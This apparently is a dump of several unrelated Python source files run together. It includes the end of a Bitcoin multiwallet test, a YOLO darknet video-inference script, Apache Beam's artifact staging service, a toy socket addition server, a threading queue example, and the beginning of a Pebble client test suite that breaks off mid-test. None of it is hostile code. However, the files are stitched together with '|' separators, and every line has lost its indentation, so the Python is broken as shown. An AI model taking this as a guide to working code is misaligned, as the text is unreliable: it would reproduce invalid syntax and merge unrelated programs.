assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
darknet_video.py
|
from ctypes import *
import random
import os
import cv2
import time
import darknet
import argparse
from threading import Thread, enumerate
from queue import Queue
def parser():
parser = argparse.ArgumentParser(description="YOLO Object Detection")
parser.add_argument("--input", type=str, default=0,
help="video source. If empty, uses webcam 0 stream")
parser.add_argument("--out_filename", type=str, default="",
help="inference video name. Not saved if empty")
parser.add_argument("--weights", default="yolov4.weights",
help="yolo weights path")
parser.add_argument("--dont_show", action='store_true',
help="windown inference display. For headless systems")
parser.add_argument("--ext_output", action='store_true',
help="display bbox coordinates of detected objects")
parser.add_argument("--config_file", default="./cfg/yolov4.cfg",
help="path to config file")
parser.add_argument("--data_file", default="./cfg/coco.data",
help="path to data file")
parser.add_argument("--thresh", type=float, default=.25,
help="remove detections with confidence below this value")
return parser.parse_args()
def str2int(video_path):
"""
argparse returns and string althout webcam uses int (0, 1 ...)
Cast to int if needed
"""
try:
return int(video_path)
except ValueError:
return video_path
def check_arguments_errors(args):
assert 0 < args.thresh < 1, "Threshold should be a float between zero and one (non-inclusive)"
if not os.path.exists(args.config_file):
raise(ValueError("Invalid config path {}".format(os.path.abspath(args.config_file))))
if not os.path.exists(args.weights):
raise(ValueError("Invalid weight path {}".format(os.path.abspath(args.weights))))
if not os.path.exists(args.data_file):
raise(ValueError("Invalid data file path {}".format(os.path.abspath(args.data_file))))
if str2int(args.input) == str and not os.path.exists(args.input):
raise(ValueError("Invalid video path {}".format(os.path.abspath(args.input))))
def set_saved_video(input_video, output_video, size):
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
fps = int(input_video.get(cv2.CAP_PROP_FPS))
video = cv2.VideoWriter(output_video, fourcc, fps, size)
return video
def video_capture(frame_queue, darknet_image_queue):
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height),
interpolation=cv2.INTER_LINEAR)
frame_queue.put(frame_resized)
darknet.copy_image_from_bytes(darknet_image, frame_resized.tobytes())
darknet_image_queue.put(darknet_image)
cap.release()
def inference(darknet_image_queue, detections_queue, fps_queue):
while cap.isOpened():
darknet_image = darknet_image_queue.get()
prev_time = time.time()
detections = darknet.detect_image(network, class_names, darknet_image, thresh=args.thresh)
detections_queue.put(detections)
fps = int(1/(time.time() - prev_time))
fps_queue.put(fps)
print("FPS: {}".format(fps))
darknet.print_detections(detections, args.ext_output)
cap.release()
def drawing(frame_queue, detections_queue, fps_queue):
random.seed(3) # deterministic bbox colors
video = set_saved_video(cap, args.out_filename, (width, height))
while cap.isOpened():
frame_resized = frame_queue.get()
detections = detections_queue.get()
fps = fps_queue.get()
if frame_resized is not None:
image = darknet.draw_boxes(detections, frame_resized, class_colors)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if args.out_filename is not None:
video.write(image)
if not args.dont_show:
cv2.imshow('Inference', image)
if cv2.waitKey(fps) == 27:
break
cap.release()
video.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
frame_queue = Queue()
darknet_image_queue = Queue(maxsize=1)
detections_queue = Queue(maxsize=1)
fps_queue = Queue(maxsize=1)
args = parser()
check_arguments_errors(args)
network, class_names, class_colors = darknet.load_network(
args.config_file,
args.data_file,
args.weights,
batch_size=1
)
# Darknet doesn't accept numpy images.
# Create one with image we reuse for each detect
width = darknet.network_width(network)
height = darknet.network_height(network)
darknet_image = darknet.make_image(width, height, 3)
input_path = str2int(args.input)
cap = cv2.VideoCapture(input_path)
Thread(target=video_capture, args=(frame_queue, darknet_image_queue)).start()
Thread(target=inference, args=(darknet_image_queue, detections_queue, fps_queue)).start()
Thread(target=drawing, args=(frame_queue, detections_queue, fps_queue)).start()
|
artifact_service.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of an Artifact{Staging,Retrieval}Service.
The staging service here can be backed by any beam filesystem.
"""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import concurrent.futures
import contextlib
import hashlib
import os
import queue
import sys
import threading
import typing
import zipfile
from io import BytesIO
from typing import Callable
from typing import Iterator
from future.moves.urllib.request import urlopen
from google.protobuf import json_format
from apache_beam.io import filesystems
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.utils import proto_utils
if typing.TYPE_CHECKING:
from typing import BinaryIO # pylint: disable=ungrouped-imports
# The legacy artifact staging and retrieval services.
class AbstractArtifactService(
beam_artifact_api_pb2_grpc.LegacyArtifactStagingServiceServicer,
beam_artifact_api_pb2_grpc.LegacyArtifactRetrievalServiceServicer):
_DEFAULT_CHUNK_SIZE = 2 << 20 # 2mb
def __init__(self, root, chunk_size=None):
self._root = root
self._chunk_size = chunk_size or self._DEFAULT_CHUNK_SIZE
def _sha256(self, string):
return hashlib.sha256(string.encode('utf-8')).hexdigest()
def _join(self, *args):
# type: (*str) -> str
raise NotImplementedError(type(self))
def _dirname(self, path):
# type: (str) -> str
raise NotImplementedError(type(self))
def _temp_path(self, path):
# type: (str) -> str
return path + '.tmp'
def _open(self, path, mode):
raise NotImplementedError(type(self))
def _rename(self, src, dest):
# type: (str, str) -> None
raise NotImplementedError(type(self))
def _delete(self, path):
# type: (str) -> None
raise NotImplementedError(type(self))
def _artifact_path(self, retrieval_token, name):
# type: (str, str) -> str
return self._join(self._dirname(retrieval_token), self._sha256(name))
def _manifest_path(self, retrieval_token):
# type: (str) -> str
return retrieval_token
def _get_manifest_proxy(self, retrieval_token):
# type: (str) -> beam_artifact_api_pb2.ProxyManifest
with self._open(self._manifest_path(retrieval_token), 'r') as fin:
return json_format.Parse(
fin.read().decode('utf-8'), beam_artifact_api_pb2.ProxyManifest())
def retrieval_token(self, staging_session_token):
# type: (str) -> str
return self._join(
self._root, self._sha256(staging_session_token), 'MANIFEST')
def PutArtifact(self, request_iterator, context=None):
# type: (...) -> beam_artifact_api_pb2.PutArtifactResponse
first = True
for request in request_iterator:
if first:
first = False
metadata = request.metadata.metadata
retrieval_token = self.retrieval_token(
request.metadata.staging_session_token)
artifact_path = self._artifact_path(retrieval_token, metadata.name)
temp_path = self._temp_path(artifact_path)
fout = self._open(temp_path, 'w')
hasher = hashlib.sha256()
else:
hasher.update(request.data.data)
fout.write(request.data.data)
fout.close()
data_hash = hasher.hexdigest()
if metadata.sha256 and metadata.sha256 != data_hash:
self._delete(temp_path)
raise ValueError(
'Bad metadata hash: %s vs %s' % (metadata.sha256, data_hash))
self._rename(temp_path, artifact_path)
return beam_artifact_api_pb2.PutArtifactResponse()
def CommitManifest(self,
request, # type: beam_artifact_api_pb2.CommitManifestRequest
context=None):
# type: (...) -> beam_artifact_api_pb2.CommitManifestResponse
retrieval_token = self.retrieval_token(request.staging_session_token)
proxy_manifest = beam_artifact_api_pb2.ProxyManifest(
manifest=request.manifest,
location=[
beam_artifact_api_pb2.ProxyManifest.Location(
name=metadata.name,
uri=self._artifact_path(retrieval_token, metadata.name))
for metadata in request.manifest.artifact
])
with self._open(self._manifest_path(retrieval_token), 'w') as fout:
fout.write(json_format.MessageToJson(proxy_manifest).encode('utf-8'))
return beam_artifact_api_pb2.CommitManifestResponse(
retrieval_token=retrieval_token)
def GetManifest(self,
request, # type: beam_artifact_api_pb2.GetManifestRequest
context=None):
# type: (...) -> beam_artifact_api_pb2.GetManifestResponse
return beam_artifact_api_pb2.GetManifestResponse(
manifest=self._get_manifest_proxy(request.retrieval_token).manifest)
def GetArtifact(self,
request, # type: beam_artifact_api_pb2.LegacyGetArtifactRequest
context=None):
# type: (...) -> Iterator[beam_artifact_api_pb2.ArtifactChunk]
for artifact in self._get_manifest_proxy(request.retrieval_token).location:
if artifact.name == request.name:
with self._open(artifact.uri, 'r') as fin:
# This value is not emitted, but lets us yield a single empty
# chunk on an empty file.
chunk = b'1'
while chunk:
chunk = fin.read(self._chunk_size)
yield beam_artifact_api_pb2.ArtifactChunk(data=chunk)
break
else:
raise ValueError('Unknown artifact: %s' % request.name)
class ZipFileArtifactService(AbstractArtifactService):
"""Stores artifacts in a zip file.
This is particularly useful for storing artifacts as part of an UberJar for
submitting to an upstream runner's cluster.
Writing to zip files requires Python 3.6+.
"""
def __init__(self, path, internal_root, chunk_size=None):
if sys.version_info < (3, 6):
raise RuntimeError(
'Writing to zip files requires Python 3.6+, '
'but current version is %s' % sys.version)
super(ZipFileArtifactService, self).__init__(internal_root, chunk_size)
self._zipfile = zipfile.ZipFile(path, 'a')
self._lock = threading.Lock()
def _join(self, *args):
# type: (*str) -> str
return '/'.join(args)
def _dirname(self, path):
# type: (str) -> str
return path.rsplit('/', 1)[0]
def _temp_path(self, path):
# type: (str) -> str
return path # ZipFile offers no move operation.
def _rename(self, src, dest):
# type: (str, str) -> None
assert src == dest
def _delete(self, path):
# type: (str) -> None
# ZipFile offers no delete operation: https://bugs.python.org/issue6818
pass
def _open(self, path, mode):
if path.startswith('/'):
raise ValueError(
'ZIP file entry %s invalid: '
'path must not contain a leading slash.' % path)
return self._zipfile.open(path, mode, force_zip64=True)
def PutArtifact(self, request_iterator, context=None):
# ZipFile only supports one writable channel at a time.
with self._lock:
return super(ZipFileArtifactService,
self).PutArtifact(request_iterator, context)
def CommitManifest(self, request, context=None):
# ZipFile only supports one writable channel at a time.
with self._lock:
return super(ZipFileArtifactService,
self).CommitManifest(request, context)
def GetManifest(self, request, context=None):
# ZipFile appears to not be threadsafe on some platforms.
with self._lock:
return super(ZipFileArtifactService, self).GetManifest(request, context)
def GetArtifact(self, request, context=None):
# ZipFile appears to not be threadsafe on some platforms.
with self._lock:
for chunk in super(ZipFileArtifactService, self).GetArtifact(request,
context):
yield chunk
def close(self):
self._zipfile.close()
class BeamFilesystemArtifactService(AbstractArtifactService):
def _join(self, *args):
# type: (*str) -> str
return filesystems.FileSystems.join(*args)
def _dirname(self, path):
# type: (str) -> str
return filesystems.FileSystems.split(path)[0]
def _rename(self, src, dest):
# type: (str, str) -> None
filesystems.FileSystems.rename([src], [dest])
def _delete(self, path):
# type: (str) -> None
filesystems.FileSystems.delete([path])
def _open(self, path, mode='r'):
dir = self._dirname(path)
if not filesystems.FileSystems.exists(dir):
try:
filesystems.FileSystems.mkdirs(dir)
except Exception:
pass
if 'w' in mode:
return filesystems.FileSystems.create(path)
else:
return filesystems.FileSystems.open(path)
# The dependency-aware artifact staging and retrieval services.
class _QueueIter(object):
_END = object()
def __init__(self):
self._queue = queue.Queue()
def put(self, item):
self._queue.put(item)
def done(self):
self._queue.put(self._END)
self._queue.put(StopIteration)
def abort(self, exn=None):
if exn is None:
exn = sys.exc_info()[1]
self._queue.put(self._END)
self._queue.put(exn)
def __iter__(self):
return self
def __next__(self):
item = self._queue.get()
if item is self._END:
raise self._queue.get()
else:
return item
if sys.version_info < (3, ):
next = __next__
class ArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
_DEFAULT_CHUNK_SIZE = 2 << 20
def __init__(
self,
file_reader, # type: Callable[[str], BinaryIO],
chunk_size=None,
):
self._file_reader = file_reader
self._chunk_size = chunk_size or self._DEFAULT_CHUNK_SIZE
def ResolveArtifact(self, request, context=None):
return beam_artifact_api_pb2.ResolveArtifactResponse(
replacements=request.artifacts)
def GetArtifact(self, request, context=None):
if request.artifact.type_urn == common_urns.artifact_types.FILE.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload,
beam_runner_api_pb2.ArtifactFilePayload)
read_handle = self._file_reader(payload.path)
elif request.artifact.type_urn == common_urns.artifact_types.URL.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload, beam_runner_api_pb2.ArtifactUrlPayload)
# TODO(Py3): Remove the unneeded contextlib wrapper.
read_handle = contextlib.closing(urlopen(payload.url))
elif request.artifact.type_urn == common_urns.artifact_types.EMBEDDED.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload,
beam_runner_api_pb2.EmbeddedFilePayload)
read_handle = BytesIO(payload.data)
else:
raise NotImplementedError(request.artifact.type_urn)
with read_handle as fin:
while True:
chunk = fin.read(self._chunk_size)
if not chunk:
break
yield beam_artifact_api_pb2.GetArtifactResponse(data=chunk)
class ArtifactStagingService(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceServicer):
def __init__(
self,
file_writer, # type: Callable[[str, Optional[str]], Tuple[BinaryIO, str]]
):
self._lock = threading.Lock()
self._jobs_to_stage = {}
self._file_writer = file_writer
def register_job(self, staging_token, dependencies):
if staging_token in self._jobs_to_stage:
raise ValueError('Already staging %s' % staging_token)
with self._lock:
self._jobs_to_stage[staging_token] = list(dependencies), threading.Event()
def resolved_deps(self, staging_token, timeout=None):
with self._lock:
dependencies_list, event = self._jobs_to_stage[staging_token]
try:
if not event.wait(timeout):
raise concurrent.futures.TimeoutError()
return dependencies_list
finally:
with self._lock:
del self._jobs_to_stage[staging_token]
def ReverseArtifactRetrievalService(self, responses, context=None):
staging_token = next(responses).staging_token
with self._lock:
dependencies, event = self._jobs_to_stage[staging_token]
requests = _QueueIter()
class ForwardingRetrievalService(object):
def ResolveArtifacts(self, request):
requests.put(
beam_artifact_api_pb2.ArtifactRequestWrapper(
resolve_artifact=request))
return next(responses).resolve_artifact_response
def GetArtifact(self, request):
requests.put(
beam_artifact_api_pb2.ArtifactRequestWrapper(get_artifact=request))
while True:
response = next(responses)
yield response.get_artifact_response
if response.is_last:
break
def resolve():
try:
file_deps = resolve_as_files(
ForwardingRetrievalService(),
lambda name: self._file_writer(os.path.join(staging_token, name)),
dependencies)
dependencies[:] = file_deps
requests.done()
except: # pylint: disable=bare-except
requests.abort()
raise
finally:
event.set()
t = threading.Thread(target=resolve)
t.daemon = True
t.start()
return requests
def resolve_as_files(retrieval_service, file_writer, dependencies):
"""Translates a set of dependencies into file-based dependencies."""
# Resolve until nothing changes. This ensures that they can be fetched.
resolution = retrieval_service.ResolveArtifacts(
beam_artifact_api_pb2.ResolveArtifactRequest(
artifacts=dependencies,
# Anything fetchable will do.
# TODO(robertwb): Take advantage of shared filesystems, urls.
preferred_urns=[],
))
dependencies = resolution.replacements
# Fetch each of the dependencies, using file_writer to store them as
# file-based artifacts.
# TODO(robertwb): Consider parallelizing the actual writes.
for dep in dependencies:
if dep.role_urn == common_urns.artifact_roles.STAGING_TO.urn:
base_name = os.path.basename(
proto_utils.parse_Bytes(
dep.role_payload,
beam_runner_api_pb2.ArtifactStagingToRolePayload).staged_name)
else:
base_name = None
unique_name = '-'.join(
filter(
None,
[hashlib.sha256(dep.SerializeToString()).hexdigest(), base_name]))
file_handle, path = file_writer(unique_name)
with file_handle as fout:
for chunk in retrieval_service.GetArtifact(
beam_artifact_api_pb2.GetArtifactRequest(artifact=dep)):
fout.write(chunk.data)
yield beam_runner_api_pb2.ArtifactInformation(
type_urn=common_urns.artifact_types.FILE.urn,
type_payload=beam_runner_api_pb2.ArtifactFilePayload(
path=path).SerializeToString(),
role_urn=dep.role_urn,
role_payload=dep.role_payload)
def offer_artifacts(
artifact_staging_service, artifact_retrieval_service, staging_token):
"""Offers a set of artifacts to an artifact staging service, via the
ReverseArtifactRetrievalService API.
The given artifact_retrieval_service should be able to resolve/get all
artifacts relevant to this job.
"""
responses = _QueueIter()
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
staging_token=staging_token))
requests = artifact_staging_service.ReverseArtifactRetrievalService(responses)
try:
for request in requests:
if request.HasField('resolve_artifact'):
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
resolve_artifact_response=artifact_retrieval_service.
ResolveArtifact(request.resolve_artifact)))
elif request.HasField('get_artifact'):
for chunk in artifact_retrieval_service.GetArtifact(
request.get_artifact):
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
get_artifact_response=chunk))
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
get_artifact_response=beam_artifact_api_pb2.GetArtifactResponse(
data=b''),
is_last=True))
responses.done()
except: # pylint: disable=bare-except
responses.abort()
raise
class BeamFilesystemHandler(object):
def __init__(self, root):
self._root = root
def file_reader(self, path):
return filesystems.FileSystems.open(path)
def file_writer(self, name=None):
full_path = filesystems.FileSystems.join(self._root, name)
return filesystems.FileSystems.create(full_path), full_path
|
adding_server.py
|
import socket
import multiprocessing as mp
import threading as thread
import sys
def message_handler(conn, address):
import sys
import lib.protocol_utils as protocol_utils
import time
import datetime
print("New connection from", address)
actual_time = datetime.datetime.utcnow()
log_file = open("adding_server_log.csv", "+a")
time.sleep(60)
raw_data = conn.recv(1024)
log_file.write("{},{},{},{},{}".format(actual_time.isoformat(), time.mktime(actual_time.timetuple()), address[0], address[1], raw_data))
data = protocol_utils.MessageHandler(raw_data).message_loads()
if data and data[0] == "+":
try:
message = protocol_utils.MessageResponseBuilder(False, str(float(data[1]) + float(data[2])))
except ValueError:
message = protocol_utils.MessageResponseBuilder(True, "The operands requires to be numbers")
else:
message = protocol_utils.MessageResponseBuilder(True, "Invalid operation")
try:
log_file.write(",{}\n".format(message.get_message()))
log_file.close()
conn.sendall(message.get_message())
conn.close()
except Exception:
print("Connection lost")
sys.exit()
def identification_handler(conn, address, operation_service_addr, operation_service_port):
raw_data = conn.recv(1024)
data = raw_data.decode("utf-8")
if data == "Sv?":
message = "serv|{}|{}".format("+", operation_service_port)
conn.sendall(message.encode())
else:
conn.send("400".encode())
conn.close()
sys.exit()
def thread_operation(socket_o):
print("Adding server operation service running ...")
while True:
conn, addr = socket_o.accept()
temp_process = mp.Process(target=message_handler, args=(conn, addr))
temp_process.start()
temp_process.join()
def thread_identification(operation_service_addr, operation_service_port):
socket_i = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_i.bind(('', 8000))
socket_i.listen(10)
print("Adding server identification service running ...")
while True:
conn, addr = socket_i.accept()
temp_process = mp.Process(target=identification_handler, args=(conn, addr, operation_service_addr, operation_service_port))
temp_process.start()
temp_process.join()
if __name__ == "__main__":
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.bind(('', 9999))
socket_instance.listen(10)
sockname = socket_instance.getsockname()
t_identification = thread.Thread(target=thread_identification, args=(sockname[0], sockname[1]))
t_identification.start()
print("Adding server operation service running ...")
processes = []
while True:
conn, addr = socket_instance.accept()
temp_process = mp.Process(target=message_handler, args=(conn, addr))
processes.append(temp_process)
temp_process.start()
|
queue_example.py
|
import threading
import queue
tasks_queue = queue.Queue()
def process_tasks_from_queue():
while True:
task_data: str = tasks_queue.get()
do_some_work(task_data)
tasks_queue.task_done()
def do_some_work(task_data: str):
print(f'Doing task_data: {task_data}...')
for _ in range(3):
thread = threading.Thread(target=process_tasks_from_queue, daemon=True)
thread.start()
for task_number in range(10):
tasks_queue.put(f'Task number: {task_number}')
tasks_queue.join()
print('All work is done - bye bye!')
|
test_pebble.py
|
#!/usr/bin/python3
# Copyright 2021 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import datetime
import email.parser
import io
import json
import os
import signal
import sys
import tempfile
import test.fake_pebble as fake_pebble
import threading
import time
import unittest
import unittest.mock
import unittest.util
import pytest
import ops.pebble as pebble
from ops._private import yaml
from ops._vendor import websocket
# Ensure unittest diffs don't get truncated like "[17 chars]"
unittest.util._MAX_LENGTH = 1000
def datetime_utc(y, m, d, hour, min, sec, micro=0):
tz = datetime.timezone.utc
return datetime.datetime(y, m, d, hour, min, sec, micro, tzinfo=tz)
def datetime_nzdt(y, m, d, hour, min, sec, micro=0):
tz = datetime.timezone(datetime.timedelta(hours=13))
return datetime.datetime(y, m, d, hour, min, sec, micro, tzinfo=tz)
class TestHelpers(unittest.TestCase):
def test_parse_timestamp(self):
self.assertEqual(pebble._parse_timestamp('2020-12-25T13:45:50+13:00'),
datetime_nzdt(2020, 12, 25, 13, 45, 50, 0))
self.assertEqual(pebble._parse_timestamp('2020-12-25T13:45:50.123456789+13:00'),
datetime_nzdt(2020, 12, 25, 13, 45, 50, 123457))
self.assertEqual(pebble._parse_timestamp('2021-02-10T04:36:22Z'),
datetime_utc(2021, 2, 10, 4, 36, 22, 0))
self.assertEqual(pebble._parse_timestamp('2021-02-10t04:36:22z'),
datetime_utc(2021, 2, 10, 4, 36, 22, 0))
self.assertEqual(pebble._parse_timestamp('2021-02-10T04:36:22.118970777Z'),
datetime_utc(2021, 2, 10, 4, 36, 22, 118971))
self.assertEqual(pebble._parse_timestamp('2020-12-25T13:45:50.123456789+00:00'),
datetime_utc(2020, 12, 25, 13, 45, 50, 123457))
tzinfo = datetime.timezone(datetime.timedelta(hours=-11, minutes=-30))
self.assertEqual(pebble._parse_timestamp('2020-12-25T13:45:50.123456789-11:30'),
datetime.datetime(2020, 12, 25, 13, 45, 50, 123457, tzinfo=tzinfo))
tzinfo = datetime.timezone(datetime.timedelta(hours=4))
self.assertEqual(pebble._parse_timestamp('2000-01-02T03:04:05.006000+04:00'),
datetime.datetime(2000, 1, 2, 3, 4, 5, 6000, tzinfo=tzinfo))
with self.assertRaises(ValueError):
pebble._parse_timestamp('')
with self.assertRaises(ValueError):
pebble._parse_timestamp('foobar')
with self.assertRaises(ValueError):
pebble._parse_timestamp('2021-99-99T04:36:22Z')
with self.assertRaises(ValueError):
pebble._parse_timestamp(pebble._parse_timestamp('2021-02-10T04:36:22.118970777x'))
with self.assertRaises(ValueError):
pebble._parse_timestamp(pebble._parse_timestamp('2021-02-10T04:36:22.118970777-99:99'))
class TestTypes(unittest.TestCase):
maxDiff = None
def test_error(self):
error = pebble.Error('error')
self.assertIsInstance(error, Exception)
def test_timeout_error(self):
error = pebble.TimeoutError('timeout!')
self.assertIsInstance(error, pebble.Error)
self.assertIsInstance(error, TimeoutError)
self.assertEqual(str(error), 'timeout!')
def test_connection_error(self):
error = pebble.ConnectionError('connerr!')
self.assertIsInstance(error, pebble.Error)
self.assertEqual(str(error), 'connerr!')
def test_protocol_error(self):
error = pebble.ProtocolError('protoerr!')
self.assertIsInstance(error, pebble.Error)
self.assertEqual(str(error), 'protoerr!')
def test_path_error(self):
error = pebble.PathError('not-found', 'thing not found')
self.assertIsInstance(error, pebble.Error)
self.assertEqual(error.kind, 'not-found')
self.assertEqual(error.message, 'thing not found')
self.assertEqual(str(error), 'not-found - thing not found')
def test_api_error(self):
body = {
"result": {
"message": "no services to start provided"
},
"status": "Bad Request",
"status-code": 400,
"type": "error"
}
error = pebble.APIError(body, 400, "Bad Request", "no services")
self.assertIsInstance(error, pebble.Error)
self.assertEqual(error.body, body)
self.assertEqual(error.code, 400)
self.assertEqual(error.status, 'Bad Request')
self.assertEqual(error.message, 'no services')
self.assertEqual(str(error), 'no services')
def test_change_error(self):
change = pebble.Change(
id=pebble.ChangeID('1234'),
kind='start',
summary='Start service "foo"',
status='Done',
tasks=[],
ready=True,
err='Some error',
spawn_time=datetime.datetime.now(),
ready_time=datetime.datetime.now(),
)
error = pebble.ChangeError(change.err, change)
self.assertIsInstance(error, pebble.Error)
self.assertEqual(error.err, 'Some error')
self.assertEqual(error.change, change)
self.assertEqual(str(error), 'Some error')
def test_change_error_with_task_logs(self):
change = pebble.Change(
id=pebble.ChangeID('1234'),
kind='start',
summary='Start service "foo"',
status='Done',
tasks=[
pebble.Task(
id=pebble.TaskID('12345'),
kind='start',
summary='Start service "foo"',
status='Error',
log=['LINE1', 'LINE2'],
progress=pebble.TaskProgress(label='foo', done=3, total=7),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218),
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158),
),
pebble.Task(
id=pebble.TaskID('12346'),
kind='start',
summary='Start service "bar"',
status='Error',
log=[],
progress=pebble.TaskProgress(label='foo', done=3, total=7),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218),
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158),
),
pebble.Task(
id=pebble.TaskID('12347'),
kind='start',
summary='Start service "bazz"',
status='Error',
log=['single log'],
progress=pebble.TaskProgress(label='foo', done=3, total=7),
